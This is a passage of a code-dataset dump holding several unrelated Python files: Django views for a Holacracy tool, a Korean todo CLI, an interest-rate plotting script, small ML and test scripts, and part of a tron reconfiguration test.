Circle.objects.filter(super_circle__isnull=True).order_by('glassfrog_id').first()\n return root_circle\n\n\ndef getBreadCrumbList(circle_object, bread_crumb_list=None):\n if not bread_crumb_list:\n bread_crumb_list = []\n parent = circle_object.super_circle\n if parent:\n bread_crumb_list.append(parent)\n bread_crumb_list = getBreadCrumbList(parent, bread_crumb_list)\n return bread_crumb_list\n\n\ndef debug(ctx):\n try:\n fail\n except:\n raise Exception(ctx)\n pass\n\ndef getLeadLinkDetails(self, filter_to_use, include_GCC = False):\n # Check if the current user is a leadlink of any circles, and pass the details of the sub-circles to the view\n person = Person.objects.get(user=self.request.user.id)\n leadlink_role_of_circles = RoleFiller.objects.filter(person=person).filter(role__name=\"Lead Link\")\n if leadlink_role_of_circles.exists():\n circles = []\n for rolefiller in leadlink_role_of_circles:\n # Find all the sub-circles where they are a leadlink\n if filter_to_use == \"super_circle\":\n filter = Circle.objects.filter(super_circle__name=rolefiller.role.circle)\n elif filter_to_use == \"rolefiller\":\n filter = Circle.objects.filter(name=rolefiller.role.circle)\n else:\n filter = None\n\n circles_to_add = filter\n for circle in circles_to_add:\n circles.append(circle)\n\n if include_GCC:\n # Special case for GCC - GCC LL should be able to set GCC points\n if rolefiller.role.circle.name == \"General Company Circle\":\n circles.append(Circle.objects.get(name=rolefiller.role.circle))\n\n return circles\n else:\n return None\n\ndef getLeadlinkCircleDetails(self):\n return getLeadLinkDetails(self, \"super_circle\", True)\n\ndef getLeadLinkRolefillerDetails(self):\n return getLeadLinkDetails(self, \"rolefiller\")\n\n# VIEW CLASSES #########################################################################################################\n\n# List View Classes #############################\nclass BullfrogListView(LoginRequiredMixin, View):\n context = {}\n login_url = reverse_lazy('login')\n template_name = '' # should override in subclasses\n\n def get_template_names(self):\n # get and validate requested output format\n output = self.request.GET.get('output') \\\n if self.request.GET.get('output') in ['html','json'] \\\n else 'html'\n # change default template to requested output version\n template_name = self.template_name.rsplit( \".\", 1 )[ 0 ] + \".\" + output\n return [template_name]\n\n def render(self, request):\n if RoleFiller.objects.filter(role__name=\"Lead Link\", person__user=self.request.user.id):\n self.context['is_leadlink'] = True\n else:\n self.context['is_leadlink'] = False\n\n return render(request, self.get_template_names()[0], self.context)\n\n\nclass Index(BullfrogListView):\n template_name = 'index.html'\n\n def get(self, request):\n\n # If the user still has the default password he has to change it\n if request.user.check_password(settings.DEFAULT_PASSWORD):\n return redirect('password_change')\n\n\n # select PEOPLE that have no fte set (usually because the were recently imported from Glassfrog)\n object_list = Person.objects.filter(contract_fte=0).order_by('name')\n self.context['persons_without_fte'] = preparePersonListContext(object_list)\n\n # select CIRCLES that have no attention points set (usually because they were recently imported from Glassfrog)\n object_list = Circle.objects.filter(attention_points=0).order_by('name')\n # self.context['circles_without_attention_points'] = prepareCircleListContext(object_list, field_to_sum='attention_points')\n self.context['circles_without_attention_points'] = prepareSubCircleListContextRecursive(None, object_list)\n\n # select ROLEFILLERS that have no attention points set (usually because they were recently imported from Glassfrog)\n object_list = RoleFiller.objects.filter(attention_points=0).order_by('role')\n self.context['rolefillers_without_attention_points'] = prepareObjectListContext(object_list, field_to_sum='attention_points')\n\n # select PEOPLE that are no longer in Glassfrog\n object_list = getObjectsNotInGlassfrog(Person)\n self.context['persons_not_in_glassfrog'] = preparePersonListContext(object_list)\n\n # select CIRCLES that are no longer in Glassfrog\n object_list = getObjectsNotInGlassfrog(Circle)\n self.context['circles_not_in_glassfrog'] = prepareObjectListContext(object_list,\n field_to_sum='attention_points')\n\n # select ROLEFILLER that are no longer in Glassfrog\n object_list = getObjectsNotInGlassfrog(RoleFiller, orderBy='role')\n self.context['rolefillers_not_in_glassfrog'] = prepareObjectListContext(object_list,\n field_to_sum='attention_points')\n\n # select ROLES that are no longer in Glassfrog\n object_list = getObjectsNotInGlassfrog(Role)\n self.context['roles_not_in_glassfrog'] = prepareObjectListContext(object_list,\n field_to_sum='glassfrog_id') # summing up glassfrog_id is a 'hack'. it wont be used, but makes it possible to reuse the generic method\n\n # get information relevant for lead links\n self.context['leadlink_subcircles'] = getLeadlinkCircleDetails(self)\n self.context['leadlink_circle_rolefillers'] = getLeadLinkRolefillerDetails(self)\n\n return self.render(request)\n\n\nclass PeopleView(BullfrogListView):\n template_name = 'people.html'\n def get(self, request):\n last_import_date_person = getLastImportedDate(Person)\n object_list = getAnnotatedPersons().order_by('name').annotate(\n is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_person,then=Value(1)),default=Value(0),output_field=IntegerField()))\n self.context['persons'] = preparePersonListContext(object_list)\n\n return self.render(request)\n\n\nclass CirclesView(BullfrogListView):\n template_name = 'circles.html'\n def get(self, request):\n last_import_date_circle = getLastImportedDate(Circle)\n object_list = Circle.objects.order_by('name').annotate(\n is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_circle,then=Value(1)),default=Value(0),output_field=IntegerField()))\n self.context['circles'] = prepareSubCircleListContextRecursive(None, object_list)\n self.context['leadlink_subcircles'] = getLeadlinkCircleDetails(self)\n\n return self.render(request)\n\n\n\nclass RoleFillersView(BullfrogListView):\n template_name = 'rolefillers.html'\n def get(self, request):\n last_import_date_rolefiller = getLastImportedDate(RoleFiller)\n object_list = RoleFiller.objects.order_by('role__name', 'person__name').annotate(\n is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_rolefiller,then=Value(1)),default=Value(0),output_field=IntegerField()))\n self.context['rolefillers'] = prepareObjectListContext(object_list, 'attention_points')\n self.context['leadlink_circle_rolefillers'] = getLeadLinkRolefillerDetails(self)\n\n return self.render(request)\n\n\nclass RolesView(BullfrogListView):\n template_name = 'roles.html'\n def get(self, request):\n last_import_date_role = getLastImportedDate(Role)\n object_list = Role.objects.order_by('circle', 'name').annotate(\n is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_role,then=Value(1)),default=Value(0),output_field=IntegerField()))\n self.context['roles'] = prepareObjectListContext(object_list, 'glassfrog_id') # hack: will create an unused sum of glassfrog_id's, to be able to reuse the generic method.\n return self.render(request)\n\n\n# Update View Classes ###################################\nclass BullfrogUpdateView(LoginRequiredMixin, UpdateView):\n login_url = reverse_lazy('login')\n template_name = 'generic_update_form.html'\n fields = ['attention_points'] # default, should be overridden by subclass if you want something else\n delete_url = '_delete' # placeholder, should be overridden by subclass with something like 'person_delete'\n success_url = reverse_lazy(\n 'index') # where to return after update, can be overridden by subclass, or by passing a ?next= url parameter\n\n def get_success_url(self):\n # look in the url for the ?next= paramater, and use that to redirect on success, or default to whatever the base class returns\n return self.request.GET.get('next', super(UpdateView, self).get_success_url())\n\n\nclass PersonUpdate(BullfrogUpdateView):\n model = Person\n delete_url = 'person_delete'\n fields = ['contract_fte']\n\n\nclass CircleUpdate(BullfrogUpdateView):\n model = Circle\n delete_url = 'circle_delete'\n\n\nclass RoleFillerUpdate(BullfrogUpdateView):\n model = RoleFiller\n delete_url = 'rolefiller_delete'\n\n\nclass RoleUpdate(BullfrogUpdateView):\n model = Role\n delete_url = 'role_delete'\n success_url = reverse_lazy('roles')\n fields = [] # overriding the default\n\n\n# Delete View Classes ###################################\nclass BullfrogDeleteView(LoginRequiredMixin, DeleteView):\n login_url = reverse_lazy('login')\n template_name = 'generic_delete_form.html'\n success_url = reverse_lazy('index')\n\n\nclass PersonDelete(BullfrogDeleteView):\n model = Person\n\n\nclass CircleDelete(BullfrogDeleteView):\n model = Circle\n\n\nclass RoleFillerDelete(BullfrogDeleteView):\n model = RoleFiller\n\n\nclass RoleDelete(BullfrogDeleteView):\n model = Role\n\n\n# Detail View Classes #############################\nclass BullfrogDetailView(LoginRequiredMixin, DetailView):\n login_url = reverse_lazy('login')\n template_name = '' # should override in subclasses\n\n def get_template_names(self):\n # get and validate requested output format\n output = self.request.GET.get('output') \\\n if self.request.GET.get('output') in ['html','json'] \\\n else 'html'\n # change default template to requested output version\n template_name = self.template_name.rsplit( \".\", 1 )[ 0 ] + \".\" + output\n return [template_name]\n\n\nclass PersonDetailView(BullfrogDetailView):\n model = Person\n template_name = \"person.html\"\n\n def get_context_data(self, **kwargs):\n # get the context for this object that the super class auto generates (object details)\n context = super(PersonDetailView, self).get_context_data(**kwargs)\n # add additional data to the context, before it is passed to the template\n context['additional_context'] = getPersonDetailAdditionalContext(self.object)\n\n return context\n\n\nclass CircleDetailView(BullfrogDetailView):\n model = Circle\n template_name = \"circle.html\"\n\n def get_context_data(self, **kwargs):\n # get the context for this object that the super class auto generates (object details)\n context = super(CircleDetailView, self).get_context_data(**kwargs)\n # add additional data to the context, before it is passed to the template\n context['additional_context'] = getCircleDetailAdditionalContext(self.object)\n context['leadlink_subcircles'] = getLeadlinkCircleDetails(self)\n context['leadlink_circle_rolefillers'] = getLeadLinkRolefillerDetails(self)\n\n\n rolefillers = context['additional_context']['rolefillers']['object_list']\n personRolesList = []\n people = []\n for obj in rolefillers:\n if not obj.person.pk in people:\n people.append(obj.person.pk)\n personRoles = rolefillers.filter(person__pk=obj.person.pk)\n personRolesList.append(prepareObjectListContext(personRoles,'attention_points'))\n\n context['additional_context']['roles_per_person'] = personRolesList\n\n return context\n\n\nclass MeView(PersonDetailView):\n template_name = \"me.html\"\n\n def get(self, request):\n # If the user still has the default password he has to change it\n if request.user.check_password(settings.DEFAULT_PASSWORD):\n return redirect('password_change')\n return super(MeView, self).get(request)\n\n # Get the Person object belonging to the logged in user as the object for this view (instead of passing an object via url, like is the default for a detail view)\n def get_object(self):\n return Person.objects.get(user=self.request.user.id)\n\n def get_context_data(self, **kwargs):\n # get the context for this object that the super class auto generates (object details)\n context = super(MeView, self).get_context_data(**kwargs)\n # add additional data to the context, before it is passed to the template\n context['additional_context'] = getPersonDetailAdditionalContext(self.object)\n\n # get information relevant for lead links\n if RoleFiller.objects.filter(role__name=\"Lead Link\", person__user=self.request.user.id):\n context['is_leadlink'] = True\n leadlink_of_circles = context['additional_context']['circles_leadlink']\n\n def get_object_from_leadlinks_circles(object, role_or_circle):\n relevant_objects = []\n\n for circle in leadlink_of_circles:\n try:\n if role_or_circle == \"role\":\n circle_objects = object.filter(role__circle=circle)\n elif role_or_circle == \"supercircle\":\n circle_objects = object.filter(super_circle=circle)\n else:\n circle_objects = object.filter(circle=circle)\n\n for circle_object in circle_objects:\n relevant_objects.append(circle_object)\n except:\n pass\n\n return relevant_objects\n\n # show roles not in glassfrog\n roles_not_in_gf = getObjectsNotInGlassfrog(Role)\n context['roles_not_in_glassfrog'] = get_object_from_leadlinks_circles(roles_not_in_gf, \"circle\")\n\n # show rolefillers that have no attention points\n roles_with_no_ap = RoleFiller.objects.filter(attention_points=0).order_by('role')\n context['rolefillers_without_attention_points'] = get_object_from_leadlinks_circles(roles_with_no_ap, \"role\")\n\n # select rolefillers that are no longer in Glassfrog\n rolefillers_not_in_gf = getObjectsNotInGlassfrog(RoleFiller, orderBy='role')\n context['rolefillers_not_in_glassfrog'] = get_object_from_leadlinks_circles(rolefillers_not_in_gf, \"role\")\n\n # show circles that are no longer in Glassfrog\n circles_not_in_gf = getObjectsNotInGlassfrog(Circle)\n context['circles_not_in_glassfrog'] = get_object_from_leadlinks_circles(circles_not_in_gf, \"circle\")\n\n # show circles that have no attention points\n circles_with_no_ap = Circle.objects.filter(attention_points=0).order_by('name')\n relevant_circles_with_no_ap = get_object_from_leadlinks_circles(circles_with_no_ap, \"supercircle\")\n circle_list_prepared = prepareSubCircleListContextRecursive(subcircle_list=relevant_circles_with_no_ap)\n context['circles_without_attention_points'] = circle_list_prepared\n\n # get details of the circles that they are lead link\n leadlink_circles_list = prepareSubCircleListContextRecursive(subcircle_list=leadlink_of_circles)\n context['leadlink_circles'] = leadlink_circles_list\n\n context['leadlink_subcircles'] = getLeadlinkCircleDetails(self)\n context['leadlink_circle_rolefillers'] = getLeadLinkRolefillerDetails(self)\n\n return context\n\n\n# IMPORT VIEW ##########################################################################################################\n\nfrom aps.utils.GlassfrogImporter import GlassfrogImporter\n\nclass DoImport(LoginRequiredMixin, View):\n login_url = reverse_lazy('login')\n\n def get(self, request):\n imp = GlassfrogImporter()\n imp.doImport()\n\n numPeopleInGlassfrog = len(imp.people)\n numPeopleInBullfrog = len(Person.objects.all())\n successPeople = True if numPeopleInGlassfrog <= numPeopleInBullfrog else False\n\n numCirclesInGlassfrog = len(imp.circles)\n numCirclesInBullfrog = len(Circle.objects.all())\n successCircles = True if numCirclesInGlassfrog <= numCirclesInBullfrog else False\n\n numRolesInGlassfrog = len(imp.roles)\n numRolesInBullfrog = len(Role.objects.all())\n successRoles = True if numRolesInGlassfrog <= numRolesInBullfrog else False\n\n numRoleFillersInGlassfrog = len(imp.rolefillers)\n numRoleFillersInBullfrog = len(RoleFiller.objects.all())\n successRoleFillers = True if numRoleFillersInGlassfrog <= numRoleFillersInBullfrog else False\n\n messages = [\n 'People Import successful:' + str(successPeople),\n 'Number of people in Glassfrog:' + str(numPeopleInGlassfrog),\n 'Number of people in Bullfrog:' + str(numPeopleInBullfrog),\n '',\n 'Circles Import successful:' + str(successCircles),\n 'Number of circles in Glassfrog:' + str(numCirclesInGlassfrog),\n 'Number of circles in Bullfrog:' + str(numCirclesInBullfrog),\n '',\n 'Roles Import successful:' + str(successRoles),\n 'Number of roles in Glassfrog:' + str(numRolesInGlassfrog),\n 'Number of roles in Bullfrog:' + str(numRolesInBullfrog),\n '',\n 'Role Fillers Import successful:' + str(successRoleFillers),\n 'Number of role fillers in Glassfrog:' + str(numRoleFillersInGlassfrog),\n 'Number of role fillers in Bullfrog:' + str(numRoleFillersInBullfrog),\n ]\n\n return render(request, 'import.html', {'messages': messages})\n\n# ABOUT VIEW ##########################################################################################################\n\nclass AboutView(TemplateView):\n context = {}\n template_name = \"about.html\"\n","repo_name":"themobilecompany/Bullfrog","sub_path":"aps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"23542919577","text":"from datetime import datetime\n\nfrom todo_detail_view import TodoDetailView\nfrom constants import *\nfrom model import Repeat\nfrom todo_view_model import TodoViewModel\n\nDAY_STR = ('월', '화', '수', '목', '금', '토', '일')\n\n\nclass TodoListView:\n\n def __init__(self):\n self.viewmodel = TodoViewModel()\n\n def list(self):\n self.printlist()\n\n def search(self):\n print('검색할 항목을 선택하세요')\n print('1. 제목')\n print('2. 완료 여부')\n print('3. 진행도')\n print('4. 중요도')\n print('5. 내용')\n print('6. 날짜')\n choice = int(input('>>> '))\n\n if choice == 1:\n name = input('제목: ')\n self.printlist(name=name)\n\n if choice == 2:\n done = input('완료 여부(True/False): ')\n self.printlist(done=(done == 'True'))\n\n if choice == 3:\n try:\n progress = int(input('진행도: '))\n self.printlist(progress=progress)\n except ValueError:\n print(\"정수를 입력하세요.\")\n\n if choice == 4:\n try:\n importance = int(input('중요도: '))\n self.printlist(importance=importance)\n except ValueError:\n print(\"정수를 입력하세요.\")\n\n if choice == 5:\n content = input('내용: ')\n self.printlist(content=content)\n\n if choice == 6:\n try:\n date = datetime.strptime(input('날짜 (yyyy-mm-dd): '), '%Y-%m-%d').date()\n self.printlist(date=date)\n except ValueError:\n print('잘못된 형식입니다.')\n\n def printlist(self, **kwargs):\n for obj in self.viewmodel.get_list(**kwargs):\n print(f'날짜: {obj.date.strftime(\"%Y-%m-%d\")}')\n print(f'제목: {obj.name}')\n print(f'완료 여부: {obj.done}')\n print(f'진행도: {obj.progress}')\n print(f'중요도: {obj.importance}')\n if obj.repeat:\n print(f'반복 날짜: {\",\".join(day for i, day in enumerate(DAY_STR) if 1 << i & obj.repeat.day)}')\n print(f'반복 주기(주): {obj.repeat.week_interval}')\n print(f'만료 날짜: {obj.repeat.due.strftime(\"%Y-%m-%d\")}')\n print(f'내용: {obj.content}')\n print()\n\n while True:\n print('TODO 상세보기: {id}')\n print('종료: 엔터')\n s = input('>>> ')\n if not s:\n break\n id = int(s)\n TodoDetailView(id).load()\n print()\n\n def create(self):\n try:\n date = datetime.strptime(input('날짜 (yyyy-mm-dd): '), '%Y-%m-%d').date()\n except ValueError:\n print('잘못된 형식입니다.')\n return\n name = input('이름: ')\n content = input('내용: ')\n has_repeat = input('반복 여부(True/False): ')\n repeat = None\n if has_repeat == 'True':\n try:\n day = sum(1 << DAY_STR.index(d) for d in input('요일 (콤마로 구분): ').split(','))\n except ValueError:\n print('잘못된 형식입니다.')\n return\n try:\n week_interval = int(input('반복 간격 (주): '))\n except ValueError:\n print(\"정수를 입력하세요.\")\n return\n try:\n due = datetime.strptime(input('만료 날짜 (yyyy-mm-dd): '), '%Y-%m-%d').date()\n except ValueError:\n print('잘못된 형식입니다.')\n return\n repeat = Repeat(day=day, week_interval=week_interval, due=due)\n\n try:\n progress = int(input('진행도: '))\n except ValueError:\n print(\"정수를 입력하세요.\")\n return\n try:\n importance = int(input('중요도: '))\n except ValueError:\n print(\"정수를 입력하세요.\")\n return\n v = self.viewmodel.create(date, name, content, repeat=repeat,\n done=False, progress=progress, importance=importance)\n if v == CODE_INVALID_DATE:\n print('날짜가 잘못되었습니다.')\n elif v == CODE_INVALID_PROGRESS:\n print('진행도가 잘못되었습니다.')\n elif v == CODE_INVALID_IMPORTANCE:\n print('중요도가 잘못되었습니다.')\n\n def load(self):\n\n while True:\n print('1. 목록 출력')\n print('2. 검색')\n print('3. 추가')\n print('4. 종료')\n choice = int(input('>>> '))\n\n if choice == 1:\n self.list()\n if choice == 2:\n self.search()\n if choice == 3:\n self.create()\n if choice == 4:\n break\n\n\nif __name__ == '__main__':\n todo = TodoListView()\n todo.load()\n","repo_name":"Over-the-SNU/Time-Prototype","sub_path":"todo_view.py","file_name":"todo_view.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"30941554612","text":"from testsutes.base_tecase import BaseTestCase\nfrom framework.Logger import Logger\nfrom memorandum.homepage import HomePage\nimport unittest\nimport appium\nlogger=Logger(\"register\").getlog()\nclass testRegister(BaseTestCase):\n def test_Register(self):\n self.hp=HomePage(self.driver)\n self.hp.register(\"LOL\",\"LOL@qq.com\",\"7654321\")\n try:\n self.assertEqual(\"智能备忘录\",self.driver.find_element(*self.hp.assertmemo).text)\n logger.info(\"注册成功\")\n print(\"jjjjjjjjjjjj\")\n except Exception as e:\n logger.error(\"注册失败\")\n print(\"hhhhhhhhhhhhhhhh\")\n self.hp.exit_login()\nif __name__==\"__main__\":\n unittest.main(verbosity=2)\n\n","repo_name":"15935622817/appium","sub_path":"testsutes/test_register.py","file_name":"test_register.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"30209933790","text":"from os import path\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom yieldenv.settings import PROJECT_ROOT\n\nRB_FACTOR = 25\nRS_FACTOR = 50\n# EXPONENT = 0.7\n\n\ndef borrow_lend_rates(\n util_rate: float,\n rb_factor: float = RB_FACTOR,\n rs_factor: float = RS_FACTOR,\n) -> tuple[float, float]:\n \"\"\"\n calculate borrow and supply rates based on utilization ratio\n with an arbitrarily-set shape\n \"\"\"\n\n assert (\n 0 <= util_rate < 1\n ), f\"utilization ratio must lie in [0,1), but got {util_rate}\"\n\n borrow_rate = util_rate / (rb_factor * (1 - util_rate))\n # initial_borrow_rate / (1 - util_rate) ** EXPONENT\n supply_rate = util_rate / (rs_factor * (1 - util_rate))\n # initial_supply_rate / (1 - util_rate) ** EXPONENT\n return borrow_rate, supply_rate\n\n\nif __name__ == \"__main__\":\n # exploratory plot\n util_rates = np.concatenate(\n [np.arange(0, 0.83, step=0.02), np.arange(0.835, 0.9999, step=0.0001)]\n )\n\n borrow_rates = []\n lend_rates = []\n\n for u in util_rates:\n r1, r2 = borrow_lend_rates(u)\n borrow_rates.append(r1)\n lend_rates.append(r2)\n\n plt.rcParams.update({\"font.size\": 15})\n\n plt.plot(\n util_rates,\n borrow_rates,\n label=f\"borrow interest rate $r_b=\\\\frac{{u}}{{{RB_FACTOR} \\\\times (1-u)}}$\",\n )\n plt.plot(\n util_rates,\n lend_rates,\n label=f\"supply interest rate $r_s=\\\\frac{{u}}{{{RS_FACTOR} \\\\times (1-u)}}$\",\n )\n plt.xlabel(\"utilization ratio $u$\")\n plt.ylabel(\"interest rate per annum $r$\")\n plt.xlim(0, 1)\n plt.ylim(0, 1.6)\n plt.legend(frameon=False)\n plt.tight_layout()\n fig_path = path.join(PROJECT_ROOT, f\"assets/interest_model.pdf\")\n plt.savefig(fig_path)\n plt.show()\n plt.close()\n","repo_name":"xujiahuayz/yieldAggregators","sub_path":"yieldenv/interest_rate.py","file_name":"interest_rate.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"}
+{"seq_id":"1802013995","text":"\"\"\"\nМодель таблицы.\n\"\"\"\n\nfrom sqlalchemy import CheckConstraint, Column, Date, Integer, String\nfrom sqlalchemy.engine import Engine\nfrom sqlalchemy.ext.declarative import declarative_base\n\nBase = declarative_base()\n\n\nclass Data(Base):\n \"\"\"\n Класс для таблицы, где мы будем хранить данные.\n \"\"\"\n\n __tablename__ = \"data\"\n id = Column(\"id\", Integer, primary_key=True)\n company = Column(\"company\", String, nullable=False)\n metric = Column(\"metric\", String)\n date = Column(\"date\", Date)\n fact = Column(\"fact\", Integer)\n forecast = Column(\"forecast\", Integer)\n check = CheckConstraint(\"metric = 'Qliq' or metric = 'Qoil'\")\n\n def __repr__(self) -> str:\n return f\"\"\"\n {self.date} {self.company} получила {self.fact} {self.metric}\n Прогноз: {self.forecast}\n \"\"\"\n\n\ndef create_tables(engine: Engine) -> None:\n \"\"\"\n Создаёт таблицу (предварительно удалив, если она уже существует).\n\n Args:\n engine: двигатель SQLAlchemy\n \"\"\"\n Base.metadata.drop_all(engine)\n Base.metadata.create_all(engine)\n","repo_name":"vyhuholl/test_backend_developer","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"37999374858","text":"import pandas as pd\nimport xgboost as xgb\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\nglh_df = pd.read_csv(r'C:\\Users\\LENOVO\\CV\\textile-defect-inspection\\dataset\\glh_features.csv')\nglcm_df = pd.read_csv(r'C:\\Users\\LENOVO\\CV\\textile-defect-inspection\\dataset\\glcm_features.csv')\n\ndf = pd.concat([glcm_df,glh_df],axis=1)\n\nX = df.iloc[:,:-1]\ny = df['label']\n\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.3, random_state=None)\n\nscaler = MinMaxScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\nxgb_classifier = xgb.XGBClassifier()\nxgb_classifier.fit(X_train,y_train)\n\ny_pred = xgb_classifier.predict(X_test)\n\nprint(accuracy_score(y_test, y_pred))\nprint(confusion_matrix(y_test, y_pred))","repo_name":"soucs/textile-defect-inspection","sub_path":"xgboost.py","file_name":"xgboost.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"69957641505","text":"import pygame\npygame.init()\nclass button:\n def __init__(self,\n x = None,\n y = None,\n w = None,\n h = None,\n c = None):\n self.x = x\n self.y = y\n self.h = h\n self.w = w\n self.c = c\n self.rect = pygame.Rect(self.x,self.y,self.w,self.h)\n def draw(self,pygame_window):\n pygame.draw.rect(pygame_window,self.c,self.rect)\nbut1 = button(x=0,y=0,w=600,h=300,c=(0,0,255))","repo_name":"dimasribnyj14/HomeWorksDimaSribnyj","sub_path":"Practice/Second Course Logika/gimn/modules/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"27844302117","text":"\"\"\"Tests for reconfiguring mcp.\"\"\"\nimport os\nimport tempfile\n\nimport pytest\n\nfrom testifycompat import assert_equal\nfrom testifycompat import run\nfrom testifycompat import setup\nfrom testifycompat import suite\nfrom testifycompat import teardown\nfrom testifycompat import TestCase\nfrom tests.assertions import assert_length\nfrom tron import mcp\nfrom tron.config import config_parse\nfrom tron.config import schema\nfrom tron.serialize import filehandler\n\n\nclass TestMCPReconfigure(TestCase):\n\n os.environ[\"SSH_AUTH_SOCK\"] = \"test-socket\"\n pre_config = dict(\n ssh_options=dict(agent=True, identities=[\"tests/test_id_rsa\"],),\n nodes=[dict(name=\"node0\", hostname=\"batch0\"), dict(name=\"node1\", hostname=\"batch1\"),],\n node_pools=[dict(name=\"nodePool\", nodes=[\"node0\", \"node1\"])],\n command_context={\"thischanges\": \"froma\",},\n jobs=[\n dict(\n name=\"test_unchanged\",\n node=\"node0\",\n schedule=\"daily\",\n actions=[dict(name=\"action_unchanged\", command=\"command_unchanged\",),],\n ),\n dict(\n name=\"test_remove\",\n node=\"node1\",\n schedule={\"type\": \"cron\", \"value\": \"* * * * *\"},\n actions=[dict(name=\"action_remove\", command=\"command_remove\",),],\n cleanup_action=dict(name=\"cleanup\", command=\"doit\"),\n ),\n dict(\n name=\"test_change\",\n node=\"nodePool\",\n schedule={\"type\": \"cron\", \"value\": \"* * * * *\"},\n actions=[\n dict(name=\"action_change\", command=\"command_change\",),\n dict(name=\"action_remove2\", command=\"command_remove2\", requires=[\"action_change\"],),\n ],\n ),\n dict(\n name=\"test_daily_change\",\n node=\"node0\",\n schedule=\"daily\",\n actions=[dict(name=\"action_daily_change\", command=\"command\",),],\n ),\n dict(\n name=\"test_action_added\",\n node=\"node0\",\n schedule={\"type\": \"cron\", \"value\": \"* * * * *\"},\n actions=[dict(name=\"action_first\", command=\"command_do_it\"),],\n ),\n ],\n )\n\n post_config = dict(\n ssh_options=dict(agent=True, identities=[\"tests/test_id_rsa\"],),\n nodes=[dict(name=\"node0\", hostname=\"batch0\"), dict(name=\"node1\", hostname=\"batch1\"),],\n node_pools=[dict(name=\"nodePool\", nodes=[\"node0\", \"node1\"])],\n command_context={\"a_variable\": \"is_constant\", \"thischanges\": \"tob\",},\n jobs=[\n dict(\n name=\"test_unchanged\",\n node=\"node0\",\n schedule=\"daily\",\n actions=[dict(name=\"action_unchanged\", command=\"command_unchanged\",),],\n ),\n dict(\n name=\"test_change\",\n node=\"nodePool\",\n schedule=\"daily\",\n actions=[dict(name=\"action_change\", command=\"command_changed\",),],\n ),\n dict(\n name=\"test_daily_change\",\n node=\"node0\",\n schedule=\"daily\",\n actions=[dict(name=\"action_daily_change\", command=\"command_changed\",),],\n ),\n dict(\n name=\"test_new\",\n node=\"nodePool\",\n schedule={\"type\": \"cron\", \"value\": \"* * * * *\"},\n actions=[dict(name=\"action_new\", command=\"command_new\",),],\n ),\n dict(\n name=\"test_action_added\",\n node=\"node0\",\n schedule={\"type\": \"cron\", \"value\": \"* * * * *\"},\n actions=[\n dict(name=\"action_first\", command=\"command_do_it\"),\n dict(name=\"action_second\", command=\"command_ok\"),\n ],\n ),\n ],\n )\n\n def _get_config(self, idx, output_dir):\n config = dict(self.post_config if idx else self.pre_config)\n config[\"output_stream_dir\"] = output_dir\n return config\n\n def _get_runs_to_schedule(self, sched):\n last_run = sched.job.runs.get_newest(include_manual=False)\n last_run_time = last_run.run_time if last_run else None\n return sched.get_runs_to_schedule(last_run_time)\n\n @setup\n def setup_mcp(self):\n self.test_dir = tempfile.mkdtemp()\n self.mcp = mcp.MasterControlProgram(self.test_dir, \"config\")\n config = {schema.MASTER_NAMESPACE: self._get_config(0, self.test_dir)}\n container = config_parse.ConfigContainer.create(config)\n self.mcp.apply_config(container)\n\n @teardown\n def teardown_mcp(self):\n filehandler.OutputPath(self.test_dir).delete()\n filehandler.FileHandleManager.reset()\n\n def reconfigure(self):\n config = {schema.MASTER_NAMESPACE: self._get_config(1, self.test_dir)}\n container = config_parse.ConfigContainer.create(config)\n self.mcp.apply_config(container, reconfigure=True)\n\n @suite(\"integration\")\n def test_job_list(self):\n count = len(self.pre_config[\"jobs\"])\n assert_equal(len(self.mcp.jobs.get_names()), count)\n self.reconfigure()\n assert_equal(len(self.mcp.jobs.get_names()), count)\n\n @pytest.mark.skip(reason=\"This test doesn't currently as run1 is not scheduled.\",)\n @suite(\"integration\")\n def test_job_unchanged(self):\n assert \"MASTER.test_unchanged\" in self.mcp.jobs\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_unchanged\")\n orig_job = job_sched.job\n run0 = next(self._get_runs_to_schedule(job_sched))\n run0.start()\n run1 = next(self._get_runs_to_schedule(job_sched))\n\n assert_equal(job_sched.job.name, \"MASTER.test_unchanged\")\n action_map = job_sched.job.action_graph.action_map\n assert_equal(len(action_map), 1)\n assert_equal(action_map[\"action_unchanged\"].name, \"action_unchanged\")\n assert_equal(str(job_sched.job.scheduler), \"daily 00:00:00 \")\n\n self.reconfigure()\n assert job_sched is self.mcp.jobs.get_by_name(\"MASTER.test_unchanged\")\n assert job_sched.job is orig_job\n\n assert_equal(len(job_sched.job.runs.runs), 2)\n assert_equal(job_sched.job.runs.runs[1], run0)\n assert_equal(job_sched.job.runs.runs[0], run1)\n assert run1.is_scheduled\n assert_equal(job_sched.job.context[\"a_variable\"], \"is_constant\")\n assert_equal(job_sched.job.context[\"thischanges\"], \"tob\")\n\n @suite(\"integration\")\n def test_job_unchanged_disabled(self):\n job_sched = self.mcp.jobs.get_by_name(\"MASTER.test_unchanged\")\n orig_job = job_sched.job\n next(self._get_runs_to_schedule(job_sched))\n 